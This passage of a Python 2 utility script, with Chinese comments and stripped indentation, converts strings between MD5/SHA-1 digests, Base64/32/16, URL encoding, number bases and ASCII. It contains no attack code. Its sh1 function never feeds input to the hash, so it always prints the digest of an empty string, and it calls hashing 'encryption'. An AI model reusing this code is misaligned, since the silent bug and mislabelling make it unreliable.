-ord Letter To ASCII attention Example -ord asdfasfa -ord="dfafs afasfa asfasf"
-chr ASCII To Letters Example -chr 105 -chr = "102 258 654"
""")
# 進行MD5加密
def md5(s):
original = s
md = hashlib.md5()
s = s.encode(encoding='utf-8')
md.update(s)
print('Original:' + original)
print('Md5 Encryption:' + md.hexdigest())
# 進行sh1加密
def sh1(s):
original = s
sh = hashlib.sha1()
s = s.encode(encoding='utf-8')
print('Original:' + original)
print('SH1 Encryption:' + sh.hexdigest())
# 將字串轉換為base64編碼格式
def stringToB64(s):
encode = base64.b64encode(s)
print('Original:' + s)
print('Base64 encode:' + encode)
# 將base64編碼格式轉化為正常的字元型別
def b64ToString(s):
decode = base64.b64decode(s)
print('Base64:' + s)
print('Base64 decode:' + decode)
# 將字串轉為b32編碼格式
def stringToB32(s):
encode = base64.b32encode(s)
print('Original:' + s)
print('Base32 encode:' + encode)
# 將base32編碼格式轉化為正常的字元型別
def b32ToString(s):
decode = base64.b32decode(s)
print('Base32:' + s)
print('Base32 decode:' + decode)
# 將字串轉為base16編碼格式
def stringToB16(s):
encode = base64.b16encode(s)
print('Original:' + s)
print('Base16 encode:' + encode)
# 將base16編碼格式轉化為正常的字元型別
def b16ToString(s):
decode = base64.b16decode(s)
print('Base16:' + s)
print('Base16 decode:' + decode)
# 進行url編碼
def urlEncode(s):
encode = urllib.quote(s)
print('Original:' + s)
print('URL encode:' + encode)
# 進行url編碼
def urlDecode(s):
decode = urllib.unquote(s)
print('URL encode:' + s)
print('URL decode:' + decode)
# 將二進位制轉化為十進位制
def binToDec(s):
result = int(s, 2)
print('Binary :' + str(s))
print('Decimal :' + str(result))
# 將八進位制轉化為十進位制
def octToDec(s):
result = int(s, 8)
print('Octal :' + str(s))
print('Decimal :' + str(result))
# 將十六進位制轉化為十進位制
def hexToDec(s):
result = int(s, 16)
print('Hex :' + str(s))
print('Decimal :' + str(result))
# 將十進位制轉化為二進位制
def decToBin(s):
s = int(s)
result = bin(s)
print('Decimal:' + str(s))
print('Binary:' + str(result))
# 將十進位制轉化為八進位制
def decToOct(s):
s = int(s)
result = oct(s)
print('Decimal :' + str(s))
print('Octal :' + str(result))
# 將十進位制轉化為十六進位制
def decToHex(s):
s = int(s)
result = hex(s)
print('Decimal :' + str(s))
print('Hex :' + str(result))
# 將字母轉化為對應的ASCII
def lettToASCII(s):
print('Letters:' + s)
result = ''
for i in s:
result = result + str(ord(i)) + ' '
print('ASCII :' + result)
# 將ASCII轉化為對應的字母以及字元
def asciiToLett(s):
list = s.split(' ')
result = ''
print('ASCII :' + s)
for i in list:
i = int(i)
result = result + chr(i)
print('Letters :' + result)
if __name__ == '__main__':
menu()